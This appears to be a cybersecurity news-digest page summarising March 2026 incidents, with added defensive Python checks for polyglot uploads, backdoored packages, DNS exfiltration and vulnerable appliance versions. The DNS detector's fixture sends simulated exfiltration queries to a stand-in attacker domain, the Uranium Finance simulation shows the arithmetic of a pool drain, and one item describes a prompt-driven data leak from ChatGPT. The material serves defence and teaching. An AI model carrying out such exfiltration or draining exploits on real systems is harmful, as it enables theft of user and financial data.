
Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

News Summary

Last updated: 13:15 31/03/2026 UTC
  • Unauthenticated remote code execution flaw in Magento and Adobe Commerce via PolyShell polyglot uploads A critical unauthenticated remote code execution vulnerability named PolyShell affects all supported versions of Magento Open Source and Adobe Commerce 2.x, enabling attackers to upload polyglot files via the REST API and achieve code execution. Adobe has so far shipped a fix only in the 2.4.9 alpha release, leaving production deployments without a patch. Exploitation is under way in the wild: mass scanning from more than 50 IP addresses has been observed since March 19, 2026, and successful compromises have been detected in 56.7% of vulnerable stores. Attackers are using the flaw to deploy a new WebRTC-based payment skimmer that bypasses Content Security Policy (CSP) and exfiltrates payment data over encrypted UDP, a notable evolution in skimmer tactics. Immediate mitigation is critical given the scale of abuse and the potential for mass compromise of e-commerce storefronts.
  • UK NCA and NatWest Warn of Rising Invoice Fraud Threats The UK National Crime Agency (NCA) and NatWest Bank initially warned of rising invoice fraud in January 2026, reporting nearly £4 million in losses from 83 cases in September 2025 and urging businesses to verify payment details. Recent attention has focused on the construction sector, where complex supply chains and high-value email payments create elevated risks. Invoice fraud, a form of business email compromise (BEC), involves impersonating suppliers by changing bank details on fake invoices or hijacking supplier email accounts to gather intelligence before issuing fraudulent invoices. The NCA reports that construction and manufacturing accounted for a quarter of all invoice fraud cases in 2024/25, the highest of any sector. The agency is actively disrupting criminal networks while promoting prevention measures such as checking for email anomalies, verifying invoices via trusted channels, and requiring colleague authorization for high-value payments. Globally, BEC scams cost nearly $2.8 billion in 2024, according to the FBI, underscoring the severity of the threat.
  • TeamPCP escalates CanisterWorm campaign with geopolitical targeting and multi-vector attacks TeamPCP has escalated its multi-vector CanisterWorm campaign into a broader, geopolitically targeted operation, now compromising trusted PyPI packages to deliver credential-stealing malware with automated execution mechanisms. The group has backdoored the LiteLLM (versions 1.82.7 and 1.82.8) and Telnyx (versions 4.87.1 and 4.87.2) Python packages, embedding malware that harvests SSH keys, cloud credentials, Kubernetes secrets, database credentials, cryptocurrency wallets, TLS/SSL private keys, and bash history files before exfiltrating the data to attacker-controlled infrastructure and establishing persistent backdoors. The campaign began as a supply-chain attack involving 47 compromised npm packages and the @teale.io/eslint-config variant, using ICP canisters for decentralized C2 and masqueraded systemd services for persistence. It escalated to GitHub repository hijacking (e.g., Aqua Security), Docker Hub compromise, and deployment of an infostealer, then pivoted to targeting CI/CD pipelines directly through GitHub Actions workflows (e.g., Checkmarx, Trivy) using stolen credentials. TeamPCP now compromises GitHub Actions workflows and Open VSX extensions to deploy the TeamPCP Cloud stealer, while refining destructive payloads aimed at Iranian systems in Kubernetes environments with time-zone and locale-keyed wipers. The LiteLLM and Telnyx compromises demonstrate rapid iteration and maturation of the group's supply chain methodology, with evidence suggesting collaboration with the Vectr ransomware group for follow-on ransomware operations.
  • Shamos Infostealer Targeting Mac Devices via ClickFix Attacks In March 2026, Apple introduced a Terminal security feature in macOS Tahoe 26.4 that blocks execution of pasted commands and warns users of potential risks, directly targeting ClickFix-style social engineering attacks used to distribute malware such as Shamos and MacSync. Since June 2025, the COOKIE SPIDER group's Shamos infostealer has targeted Mac devices via ClickFix attacks, stealing data and credentials from browsers, Keychain, Apple Notes, and cryptocurrency wallets. Early variants relied on malvertising and fake GitHub repositories to trick users into executing shell commands, while later MacSync variants used digitally signed, notarized Swift applications to bypass Gatekeeper checks. Recent campaigns have leveraged legitimate platforms like Cloudflare Pages and Squarespace to host malicious installers, with ClickFix evolving to require minimal user pretexts.
  • Russian UNC6353 Uses Coruna and Darksword iOS Exploit Kits Across iOS 13–18.7 Targeting Financial Espionage and Data Theft Apple has begun sending Lock Screen notifications to iPhones and iPads running outdated iOS versions, warning users of active web-based exploits and urging immediate updates. This follows Apple's support document alerting users to exploit kits like Coruna (targeting iOS 13–18.7) and Darksword (targeting iOS 18.4–18.7) and the public leak of a newer Darksword version on GitHub. Coruna and Darksword are now independently confirmed as closely related frameworks with shared origins in the 2019–2023 Operation Triangulation campaign, reinforcing attribution to the Russian threat actor UNC6353 and associated groups. Coruna has evolved from a precision espionage tool into a mass-exploitation framework with 23 exploits across five chains, while Darksword is now publicly leaked and targets iOS 18.7. Apple has patched all exploited flaws in recent releases (iOS 18.7.3, 26.2 and 26.3.1), and CISA has mandated that federal agencies patch three Darksword-linked vulnerabilities (CVE-2025-31277, CVE-2025-43510, CVE-2025-43520) by April 3, 2026. Campaigns linked to UNC6353, UNC6748, and the Turkish vendor PARS Defense highlight the growing commoditization of iOS exploitation tools and the elevated risk to end users globally.
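The PolyShell item above says only that the bug is reached through polyglot uploads to the REST API. The following check is an added example (not Adobe's, Magento's or CyberHappenings' code) of the upload validation a PHP storefront should apply regardless of the specific bug: it assumes the common polyglot shape, a file that passes an image-signature check but also carries a PHP open tag. The sample bytes are constructed.

```python
"""Reject image/PHP polyglot uploads before they reach disk.

Added example, not vendor code. Assumption: the polyglot is an image
signature followed (anywhere) by PHP code, so an extension-based handler
or a later include() would execute it. Sample inputs are constructed.
"""
import re

IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
EXT_FOR = {"png": {"png"}, "jpeg": {"jpg", "jpeg"}, "gif": {"gif"}}
# '<?php' or the short echo tag '<?='; case-insensitive because PHP is.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def image_type(data):
    """Image kind by leading signature, or None if not an image we accept."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def is_polyglot(data):
    """True when the bytes look like an image *and* contain PHP code
    (the classic 'GIF89a<?php' shape and its JPEG/PNG-comment variants)."""
    return image_type(data) is not None and PHP_TAG.search(data) is not None


def classify_upload(data, declared_ext):
    """Accept only a clean image whose declared extension matches its content."""
    kind = image_type(data)
    if kind is None:
        return "reject: not an image"
    ext = declared_ext.lower().lstrip(".")
    if ext not in EXT_FOR[kind]:
        return "reject: extension does not match content"
    if is_polyglot(data):
        return "reject: polyglot (image + PHP)"
    return "accept"


# Constructed samples: a truncated GIF header and the same header with PHP appended.
CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff\x00;"
POLYGLOT_GIF = b"GIF89a\x01\x00\x01\x00" + b"<?php echo 'polyglot'; ?>"

if __name__ == "__main__":
    for name, blob, ext in [("clean", CLEAN_GIF, "gif"),
                            ("polyglot", POLYGLOT_GIF, "gif"),
                            ("renamed", POLYGLOT_GIF, "php")]:
        print(name, "->", classify_upload(blob, ext))
```

Signature plus tag scanning is a filter, not a guarantee: production handling should also re-encode the image with an image library (which drops foreign trailing bytes and metadata), store uploads outside the document root, and serve them from a path the web server never hands to the PHP interpreter.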

Latest updates


Supply chain compromise in Trivy scanner triggers CanisterWorm propagation across CI/CD pipelines

Updated: 31.03.2026 20:53 · First: 23.03.2026 15:14 · 📰 6 src / 6 articles

The TeamPCP threat group has expanded its supply chain campaign from credential theft and worm propagation to monetization via partnerships with extortion groups, including Lapsus$ and the Vect ransomware operation. Research from Wiz (Google Cloud) confirms TeamPCP is validating, encrypting, and exfiltrating stolen cloud and Kubernetes secrets to attacker infrastructure, while explicitly collaborating with Lapsus$ on follow-on attacks. Cisco disclosed a breach of its internal development environment directly linked to the Trivy supply chain attack, in which attackers used a malicious GitHub Action to steal credentials and source code from dozens of devices. The incident resulted in the cloning of over 300 repositories, including proprietary AI product code and code belonging to corporate customers such as banks, BPOs, and US government agencies. Attackers also stole and abused AWS keys to conduct unauthorized activity in a subset of Cisco's cloud accounts. Cisco has isolated systems, reimaged devices, and is rotating credentials widely; multiple threat actors were observed participating in the breach. Security researchers describe this as a 'dangerous convergence' between supply chain attackers and extortion gangs, creating a 'snowball effect' that requires immediate security action across cloud-native environments. The campaign now spans CI/CD pipelines (Trivy, Checkmarx KICS), container registries (Aqua Security Docker Hub images), LLM integration tools (LiteLLM), monetization through ransomware and extortion, and direct enterprise compromises such as the Cisco breach. Key milestones: the initial Trivy compromise on March 19, 2026; CanisterWorm and wiper deployment over March 21–22, 2026; the expansion to LiteLLM; and the current monetization phase, in which affected organizations are targeted for follow-on extortion, ransomware, and enterprise intrusions like the Cisco incident.
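Two concrete checks follow from this entry and from the summary item on the LiteLLM and Telnyx compromises: is a backdoored package version installed anywhere, and does any workflow reference a third-party action by a movable tag or branch, which is what a compromised maintainer account exploits. The script below is an added example, not Wiz's, Cisco's or CyberHappenings' code. The compromised versions are the ones the page names; assigning 1.82.x to litellm and 4.87.x to telnyx follows the order in which the page lists them. The freeze output and workflow are constructed samples, and the SHA in the sample is a placeholder.

```python
"""Audit a Python environment and GitHub Actions workflows against the
TeamPCP indicators on this page. Added example; inputs are constructed."""
import re

# Package -> versions the page reports as backdoored (PyPI names, lowercase).
COMPROMISED = {
    "litellm": {"1.82.7", "1.82.8"},
    "telnyx": {"4.87.1", "4.87.2"},
}


def parse_freeze(text):
    """Parse `pip freeze` style 'name==version' lines into {name: version},
    normalising names as PEP 503 does (lowercase, runs of -_. become '-')."""
    found = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "==" not in line:
            continue
        name, version = line.split("==", 1)
        name = re.sub(r"[-_.]+", "-", name).lower()
        found[name] = version.split(";")[0].strip()  # drop env markers
    return found


def find_compromised(freeze_text):
    """[(name, version)] for installed packages at a backdoored version."""
    installed = parse_freeze(freeze_text)
    return sorted((name, ver) for name, ver in installed.items()
                  if ver in COMPROMISED.get(name, set()))


USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)", re.MULTILINE)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_yaml):
    """Action references not pinned to a full 40-hex commit SHA.
    Local ('./...') and docker:// references are skipped. A tag or branch
    (@v2, @master) is reported: the publisher can move it to new code."""
    flagged = []
    for ref in USES_RE.findall(workflow_yaml):
        if ref.startswith("./") or ref.startswith("docker://"):
            continue
        version = ref.rsplit("@", 1)[1] if "@" in ref else ""
        if not SHA_RE.match(version):
            flagged.append(ref)
    return flagged


# Constructed samples (not real project files; the SHA is a placeholder).
SAMPLE_FREEZE = """\
litellm==1.82.8
Telnyx==4.87.0
requests==2.32.3
"""

SAMPLE_WORKFLOW = """\
jobs:
  scan:
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: aquasecurity/trivy-action@master
      - uses: ./.github/actions/local-step
      - name: kics
        uses: checkmarx/kics-github-action@v2
"""

if __name__ == "__main__":
    print("compromised:", find_compromised(SAMPLE_FREEZE))
    print("unpinned:", unpinned_actions(SAMPLE_WORKFLOW))
```

Run it against `pip freeze` output from every build image and agent, not just developer laptops: the Cisco disclosure above shows the action ran in CI, where the harvested credentials are worth the most. Pinning to a SHA still requires reviewing what that SHA contains when you bump it.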

Escalating exposure gap in mid-market vulnerability management amid CVE volume surge and rapid exploitation timelines

First: 31.03.2026 18:35 · 📰 1 src / 1 article

Mid-market security teams increasingly rely on CVE-based vulnerability tracking, but experts warn this approach creates critical blind spots in real-world exposure management. Exploitation timelines have collapsed from months to hours, with potential for minutes or even seconds, escalating risk for organizations unable to patch within 30 days. CVE-only strategies also miss exposures that no patch addresses, such as misconfigured databases, exposed management interfaces, and unmanaged attack surface, so a fully patched environment can still be compromised.

Erosion of organizational data integrity amid AI-driven decision dependence

First: 31.03.2026 18:35 · 📰 1 src / 1 article

Organizations are increasingly prioritizing data integrity and trustworthiness as core cybersecurity concerns, driven by AI-driven decision-making systems that rely on accurate, uncompromised inputs. Data distortion—whether intentional manipulation or unintentional corruption—poses a critical operational risk, as even minor alterations in training or operational datasets can produce inaccurate or harmful outputs. The reliance on data across financial, operational, and strategic domains amplifies the impact of compromised information, transforming data integrity from a technical issue into a strategic leadership challenge. The shift reflects a recognition that modern threats target not only systems but also the data inputs these systems consume, necessitating a proactive approach to understanding data flows, sources, and transformations to prevent silent corruption. Without robust governance and continuous validation, compromised data can blend into normal operational patterns, evading detection and undermining downstream processes, particularly those driven by AI models.

AI proliferation and quantum readiness disrupting digital trust and cryptographic validation

First: 31.03.2026 18:29 · 📰 1 src / 1 article

The rapid adoption of AI agents is shifting enterprise machine-to-human identity ratios from 100:1 to projections of 1,000:1, necessitating a fundamental re-evaluation of digital trust mechanisms. Digital certificate lifespans are decreasing, increasing the operational complexity of identity lifecycle management and raising the risk of outages without automated trust infrastructure. Trust assumptions are eroding due to deepfake-enabled phishing and autonomous agents performing actions on behalf of users, necessitating cryptographic validation of content, identity, and actions.

Venom Stealer infostealer kit introduces continuous credential harvesting via malware-as-a-service model

First: 31.03.2026 17:51 · 📰 1 src / 1 article

A newly identified infostealer malware kit named Venom Stealer is offered as a malware-as-a-service (MaaS) subscription priced at $250 per month or $1,800 lifetime, enabling continuous credential harvesting and wallet cracking operations. The kit targets Windows systems via deceptive social engineering lures hosted on custom Cloudflare DNS domains, bypassing browser encryption for Chrome v10/v20 passwords without triggering User Account Control (UAC) prompts. Upon execution, it extracts and exfiltrates browser credentials, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from Chromium and Firefox browsers. Venom Stealer distinguishes itself by maintaining silent persistence through a background session listener that reports new credentials and wallet activity to command-and-control infrastructure twice daily, undermining password rotation and incident response efforts.

Emerging Enterprise AI Agent Categories and Security Governance Priorities

First: 31.03.2026 17:00 · 📰 1 src / 1 article

Enterprises are transitioning from AI chatbots to AI agents capable of autonomous reasoning, planning, and action across systems. These agents introduce new security risks driven by access scope and operational autonomy. Three primary categories of AI agents—agentic chatbots, local agents, and production agents—each present distinct identity and governance challenges. CISOs must prioritize visibility into agent identities, permissions, and interactions to mitigate exposure of sensitive data, unauthorized system modifications, and prompt injection risks. The shift underscores AI agents as first-class identities within enterprise environments, requiring identity governance frameworks to align permissions with intended agent functionality and reduce attack surfaces.

Iran-linked Pay2Key operation resurfaces with pseudo-ransomware tactics and expanded affiliate network

First: 31.03.2026 16:31 · 📰 1 src / 1 article

Iran has reactivated the state-backed Pay2Key ransomware operation, recruiting affiliates from Russian cybercrime forums to conduct pseudo-ransomware attacks against high-impact US targets as part of its ongoing geopolitical conflict with the US and Israel. The campaign blends destructive wiper malware (e.g., Apostle retrofitted as ransomware) with extortion schemes to obscure geopolitical motives, complicate attribution, and maximize disruptive and financial impact. Affiliates receive profit-sharing incentives (up to 80% payouts) for attacks aligning with Iranian state objectives, effectively outsourcing cyber retribution to the global cybercrime ecosystem.

Stealthy data exfiltration vulnerability in ChatGPT via malicious prompt and DNS side channel

First: 31.03.2026 16:01 · 📰 1 src / 1 article

A security flaw in ChatGPT allowed attackers to exfiltrate sensitive user data—including prompts, messages, and uploaded files—through a single malicious prompt and DNS side channel. The issue stemmed from a hidden outbound communication path in ChatGPT’s isolated runtime environment, enabling covert transmission of data to external servers. Exploitation did not require complex attack chains; attackers could trick users into pasting malicious prompts via social engineering. OpenAI deployed a patch on February 20 after receiving a responsible disclosure from Check Point researchers. The scope of potential exposure included corporate credentials, personal health records, and other sensitive information processed by ChatGPT users.
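The entry describes a DNS side channel out of a runtime that was supposed to be isolated. The page does not give the domain or encoding used, but DNS exfiltration has a recognisable shape in resolver logs: one client emitting many distinct, long, high-entropy subdomains under a single parent domain. The detector below is an added example, not OpenAI's, Check Point's or CyberHappenings' code; the log lines are constructed, `attacker.example` is a placeholder, and the thresholds are assumptions to tune against your own resolver baseline.

```python
"""Flag DNS-exfiltration side channels in resolver logs.
Added example; log lines are constructed, thresholds are assumptions."""
import base64
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character; base32/hex-encoded chunks score high, words low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """(subdomain, registrable) using a crude last-two-labels rule.
    Use a public suffix list in production (co.uk etc.)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def find_dns_exfil(log_lines, min_unique=5, min_entropy=3.5, min_sub_len=20):
    """Each line: '<ts> <client_ip> <qname> <qtype>'. Returns
    {'client -> parent': distinct high-entropy subdomains} for pairs that
    sent at least min_unique long, high-entropy labels to one parent."""
    seen = defaultdict(set)
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        client, qname = parts[1], parts[2]
        sub, parent = split_name(qname)
        if len(sub) < min_sub_len:
            continue
        if shannon_entropy(sub.replace(".", "")) < min_entropy:
            continue
        seen[(client, parent)].add(sub)
    return {f"{client} -> {parent}": len(subs)
            for (client, parent), subs in seen.items()
            if len(subs) >= min_unique}


def _chunk_label(i):
    """Constructed 'exfil chunk': 40 base32 chars derived from a hash, the
    same alphabet a tool would use to fit bytes into a DNS label."""
    digest = hashlib.sha256(f"chunk{i}".encode()).digest()
    return base64.b32encode(digest).decode().rstrip("=").lower()[:40]


# Constructed resolver log: benign lookups plus six chunks from one client.
SAMPLE_LOG = [
    "2026-03-31T10:00:00Z 10.0.0.5 www.openai.com A",
    "2026-03-31T10:00:01Z 10.0.0.5 aaaaaaaaaaaaaaaaaaaaaaaaaaaa.example.com A",
    "2026-03-31T10:00:10Z 10.0.0.7 update.vendor.example A",
] + [
    f"2026-03-31T10:00:0{i}Z 10.0.0.5 {_chunk_label(i)}.attacker.example TXT"
    for i in range(6)
]

if __name__ == "__main__":
    print(find_dns_exfil(SAMPLE_LOG))
```

The long-but-low-entropy name in the sample is there deliberately: length alone produces false positives from CDN and telemetry hostnames, so the entropy and distinct-count conditions are what make the rule usable. For a sandbox that should have no network path at all, the stronger control is to log and block recursive resolution from it entirely; this rule is for the environments where that is not yet true.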

Lloyds mobile banking software flaw exposes transaction data to concurrent users

First: 31.03.2026 13:07 · 📰 1 src / 1 article

A faulty software update in Lloyds Banking Group’s mobile banking platform caused a five-hour window on March 12, 2026 during which transaction details from current accounts were briefly exposed to other users accessing their transaction lists within similar timeframes. The incident affected 447,936 mobile banking users, with 114,182 potentially viewing sensitive payment details such as sort codes, account numbers, National Insurance numbers, and vehicle registrations. Balances remained unaffected and no unauthorized transactions were possible. Lloyds attributed the issue to a glitch in a software update deployed at 03:28 UTC and resolved at 08:08 UTC, with no recurrence reported.

UK employee data breach notifications reach seven-year high amid hybrid work risks

First: 31.03.2026 13:01 · 📰 1 src / 1 article

The UK Information Commissioner’s Office (ICO) received 3,872 employee data breach reports in 2025, the highest annual total in at least seven years, representing a 5% increase year-over-year and a 29% rise since 2019. Non-cyber breach incidents surged by 15% to 2,304, while cyber-related breaches declined by 6% to 1,568, highlighting persistent vulnerabilities tied to hybrid work environments. Sensitive employee information—including HR records, payroll data, disciplinary files, medical records, and identity documents—is increasingly exposed through physical and procedural failures rather than technical compromises. Employers face escalating liability risks as employees retain rights to claim stress or anxiety damages from accidental breaches, intensifying the need for coordinated HR-security governance and practical training aligned with hybrid work realities.

Exploiter charged for $53.3M Uranium Finance smart contract heist via code flaws and mixer laundering

First: 31.03.2026 12:15 · 📰 1 src / 1 article

A 36-year-old Maryland man was charged for orchestrating two smart contract heists against the Uranium Finance decentralized exchange (DEX) in April 2021, stealing approximately $53.3 million in cryptocurrency. The suspect, Jonathan Spalletta (aka "Cthulhon"), exploited code flaws in Uranium's automated market maker (AMM) contracts, forcing the exchange into insolvency. Proceeds were laundered through Tornado Cash and partially spent on high-value collectibles. The first breach on April 8, 2021, involved manipulating the AmountWithBonus variable to issue unauthorized zero-token withdrawals, draining about $1.4 million, which he partially extorted back as a sham bug bounty. The second attack on April 28, 2021, exploited a single-character error in transaction-verification logic, allowing him to withdraw 90% of the DEX's assets across 26 liquidity pools while depositing negligible value.
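The "single-character error in transaction-verification logic" behind the second heist is worth seeing in arithmetic. The simulation below is an added example, not the Uranium contract and not text from the page; it follows the widely published root cause of the April 28, 2021 drain: the pair's swap function applied a 0.16% fee against a 10000 denominator on the post-swap balances but still scaled the reserves by 1000**2 (one missing zero) on the other side of the constant-product check. Pool sizes and amounts are constructed.

```python
"""Constant-product (Uniswap-v2 style) invariant check with the
denominator mismatch reported for Uranium Finance v2. Added example."""

FEE_BPS = 16      # 0.16% swap fee expressed in basis points
DENOM = 10000     # denominator the fee-adjusted balances are scaled by

BUGGY_SCALE = 1000 ** 2   # what shipped: reserves scaled by 1000**2
FIXED_SCALE = DENOM ** 2  # what the left-hand side actually requires


def k_check_passes(reserve0, reserve1, amount0_in, amount1_in,
                   amount0_out, amount1_out, rhs_scale):
    """True if the swap passes the invariant: fee-adjusted product of the
    post-swap balances must not fall below the pre-swap product. The
    left side is scaled by DENOM per factor, so rhs_scale must be
    DENOM**2; any smaller constant lets value leave the pool."""
    balance0 = reserve0 + amount0_in - amount0_out
    balance1 = reserve1 + amount1_in - amount1_out
    if balance0 < 0 or balance1 < 0:
        return False
    adj0 = balance0 * DENOM - amount0_in * FEE_BPS
    adj1 = balance1 * DENOM - amount1_in * FEE_BPS
    return adj0 * adj1 >= reserve0 * reserve1 * rhs_scale


def max_drain_fraction(reserve0, reserve1, rhs_scale, amount_in=1):
    """Largest fraction of reserve1 (in 1/1000 steps) that can be taken
    out in exchange for `amount_in` base units of token0 while the
    check still passes."""
    best = 0
    for permille in range(0, 1000):
        out = reserve1 * permille // 1000
        if k_check_passes(reserve0, reserve1, amount_in, 0, 0, out, rhs_scale):
            best = permille
        else:
            break
    return best / 1000


if __name__ == "__main__":
    # Constructed pool: 1,000,000 of each token with 18 decimals.
    r0 = r1 = 10 ** 24
    print("buggy check, max drain for 1 wei in:", max_drain_fraction(r0, r1, BUGGY_SCALE))
    print("fixed check, max drain for 1 wei in:", max_drain_fraction(r0, r1, FIXED_SCALE))
```

With the shipped constant the right-hand side is 100 times too small, so the check tolerates any swap that leaves at least 1% of the paired reserve behind: one base unit in, up to 99% of the pool out, repeated per pool. With the matching constant the same one-unit deposit buys nothing. The lesson for reviewers is that a fee-model change touches every constant in the invariant, and a property test like `max_drain_fraction` with a negligible input would have caught the mismatch before deployment.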

Active exploitation of F5 BIG-IP RCE vulnerability CVE-2025-53521

Updated: 31.03.2026 11:45 · First: 30.03.2026 10:07 · 📰 5 src / 5 articles

CVE-2025-53521, initially disclosed as a DoS flaw in October 2025, has been reclassified as a critical RCE vulnerability (CVSS 9.8) following new exploitation activity in March 2026. Threat actors are actively exploiting the flaw by sending malicious traffic to virtual servers configured with BIG-IP APM, or to systems in appliance mode, to deploy webshells and other payloads. F5 has confirmed exploitation in the wild and published IOCs, while CISA added the flaw to its KEV catalog on March 28, 2026, mandating federal remediation within three days. Multiple actors are probing F5 infrastructure, with variations in the observed payloads and scanning that targets REST API endpoints. Shadowserver tracks over 240,000 exposed BIG-IP instances, and the UK NCSC has urged immediate patching given confirmed exploitation. The flaw affects BIG-IP APM versions 15.1.0–15.1.10, 16.1.0–16.1.6, 17.1.0–17.1.2, and 17.5.0–17.5.1. Fixed versions (15.1.10.8, 16.1.6.1, 17.1.3, 17.5.1.3) are available, and F5 recommends forensic best practices including rebuilding systems from clean media, because UCS backups may carry persistent malware.

Unauthorized access detected in Dutch Ministry of Finance policy department systems

Updated: 31.03.2026 10:52 · First: 24.03.2026 14:03 · 📰 2 src / 2 articles

The Dutch Ministry of Finance disclosed a cybersecurity incident involving unauthorized access to systems within its policy department, initially detected on March 19, 2026. On March 23, 2026, the ministry took several systems offline—including the treasury banking portal—for forensic investigation, disrupting access for approximately 1,600 public institutions. Core treasury functions retained full access to funds, and payments continued via regular banking channels. The breach affected some employees but did not impact core financial operations such as tax collection or benefits administration. The investigation, supported by the National Cyber Security Center (NCSC), external forensic experts, and Dutch authorities, remains ongoing. No threat actor has claimed responsibility, and no confirmation of data exfiltration has been provided.

Active exploitation of Citrix NetScaler ADC/Gateway memory disclosure vulnerability (CVE-2026-3055)

Updated: 31.03.2026 10:05 · First: 30.03.2026 13:45 · 📰 3 src / 3 articles

A critical out-of-bounds read vulnerability in Citrix NetScaler ADC and NetScaler Gateway, tracked as CVE-2026-3055, is being actively exploited in the wild to leak sensitive information and extract administrative session IDs from appliance memory, enabling potential full appliance takeover. Citrix disclosed the flaw on March 23, 2026, alongside a high-severity race condition, affecting builds before 14.1-60.58 and 13.1-62.23, and builds older than 13.1-37.262. The vulnerability requires the appliance to be configured as a SAML Identity Provider and affects only customer-managed systems. Exploitation was confirmed via honeypot networks on March 27, with attackers using both the /saml/login and /wsfed/passive endpoints to trigger the memory overread. Security researchers criticize Citrix's disclosure as incomplete and have published tools to detect vulnerable hosts. On March 30, 2026, CISA added CVE-2026-3055 to its Known Exploited Vulnerabilities (KEV) Catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to patch vulnerable Citrix appliances by April 2, 2026 under BOD 22-01. CISA warned the flaw poses significant risk to the federal enterprise and urged all organizations to prioritize patching. Shadowserver reports nearly 30,000 exposed NetScaler ADC appliances and over 2,300 exposed Gateway instances online.
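Both this entry and the F5 BIG-IP entry above come down to the same first task for a defender: compare an appliance inventory against the advisory's affected and fixed builds, which have different numbering schemes. The triage script below is an added example, not F5's, Citrix's or CyberHappenings' code. The branch and fix versions are the ones the two entries list; treating the NetScaler "13.1-37.262" figure as a separate 13.1-37.x branch (the FIPS/NDcPP line) is an assumption, and the inventory is constructed. It checks version strings only: the F5 advisory scopes the bug to APM, and the Citrix one to appliances configured as a SAML IdP, so a "vulnerable" result still needs that configuration check.

```python
"""Version triage for CVE-2025-53521 (BIG-IP APM) and CVE-2026-3055
(NetScaler ADC/Gateway) using the ranges this page lists. Added example."""
import re

# F5 BIG-IP APM: (branch floor, branch ceiling, first fixed), per the page.
F5_APM_RANGES = [
    ((15, 1, 0), (15, 1, 10), (15, 1, 10, 8)),
    ((16, 1, 0), (16, 1, 6), (16, 1, 6, 1)),
    ((17, 1, 0), (17, 1, 2), (17, 1, 3)),
    ((17, 5, 0), (17, 5, 1), (17, 5, 1, 3)),
]


def vtuple(s):
    return tuple(int(x) for x in s.split("."))


def f5_apm_status(version):
    """'vulnerable', 'fixed' or 'not-listed' for a BIG-IP version string.
    Branch is matched on the first three components; tuple comparison
    makes '15.1.10' sort below '15.1.10.8', i.e. still vulnerable."""
    v = vtuple(version)
    for low, high, fixed in F5_APM_RANGES:
        if low <= v[:3] <= high or v[:3] == fixed[:3]:
            return "fixed" if v >= fixed else "vulnerable"
    return "not-listed"


NS_RE = re.compile(r"^(\d+)\.(\d+)-(\d+)\.(\d+)$")


def netscaler_status(version):
    """'vulnerable', 'fixed' or 'not-listed' for a NetScaler build such as
    '14.1-60.58' (major.minor-build.subbuild)."""
    m = NS_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised NetScaler build: {version}")
    major, minor, b1, b2 = (int(x) for x in m.groups())
    build = (b1, b2)
    if (major, minor) == (14, 1):
        return "fixed" if build >= (60, 58) else "vulnerable"
    if (major, minor) == (13, 1):
        # Assumption: 13.1-37.x is the separate FIPS/NDcPP line, fixed at 37.262.
        if b1 == 37:
            return "fixed" if build >= (37, 262) else "vulnerable"
        return "fixed" if build >= (62, 23) else "vulnerable"
    return "not-listed"


def triage(inventory):
    """inventory: [(host, 'bigip'|'netscaler', version)] -> hosts to patch."""
    need_patch = []
    for host, product, version in inventory:
        status = (f5_apm_status(version) if product == "bigip"
                  else netscaler_status(version))
        if status == "vulnerable":
            need_patch.append(host)
    return need_patch


# Constructed inventory.
SAMPLE_INVENTORY = [
    ("vpn-1", "bigip", "17.1.2"),
    ("vpn-2", "bigip", "17.1.3"),
    ("lb-1", "bigip", "15.1.10.7"),
    ("gw-1", "netscaler", "14.1-56.20"),
    ("gw-2", "netscaler", "14.1-60.58"),
    ("gw-3", "netscaler", "13.1-37.250"),
]

if __name__ == "__main__":
    print("patch:", triage(SAMPLE_INVENTORY))
```

Because both advisories report exploitation in the wild, a "vulnerable" host on the list is also a candidate for the IOC sweep, and for F5 the rebuild-rather-than-restore guidance above applies if anything is found.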

Patient data exposure at CareCloud Health following March 2026 intrusion

First: 31.03.2026 00:44 · 📰 1 src / 1 article

A healthcare IT provider, CareCloud Health, experienced a cyber intrusion on March 16, 2026, resulting in an eight-hour network disruption and unauthorized access to one of six electronic health record (EHR) environments containing patient data. The incident was detected the same day, contained the same evening, and involved a single SaaS-based EHR environment among CareCloud’s six production environments. Investigation is ongoing to determine the scope of data access and potential exfiltration. The attacker’s access was removed, all systems were restored, and external cybersecurity experts are assisting in remediation and hardening efforts. No public ransomware group has claimed responsibility for the intrusion at this time.

DeepLoad malware campaign leverages AI-generated obfuscation and ClickFix for persistent credential theft

Updated: 31.03.2026 00:25 · First: 30.03.2026 15:00 · 📰 3 src / 3 articles

A malicious campaign named DeepLoad is actively targeting enterprise networks to steal user credentials and maintain persistent access. The malware combines ClickFix social engineering, which tricks users into executing PowerShell commands through the Windows Run dialog, with delivery via compromised websites or SEO-poisoned search results. DeepLoad buries its functional payload in layers of AI-generated obfuscation, padding the script with meaningless variable assignments to evade file-based detection. It abuses the Windows lock screen process ('LockAppHost.exe') and Windows Management Instrumentation (WMI) to achieve persistence, automatically re-infecting systems three days after initial removal without further user or attacker action. The campaign spreads via USB drives within minutes of infection, planting decoy shortcut files such as 'ChromeSetup.lnk' and 'Firefox Installer.lnk' to enable lateral movement. DeepLoad also deploys a standalone credential stealer ('filemanager.exe') that exfiltrates stored browser passwords, and a malicious browser extension that intercepts keystrokes in real time during login sessions. Impact includes unauthorized access to enterprise accounts, potential data exfiltration, and a sustained foothold in compromised networks despite apparent cleanup efforts.
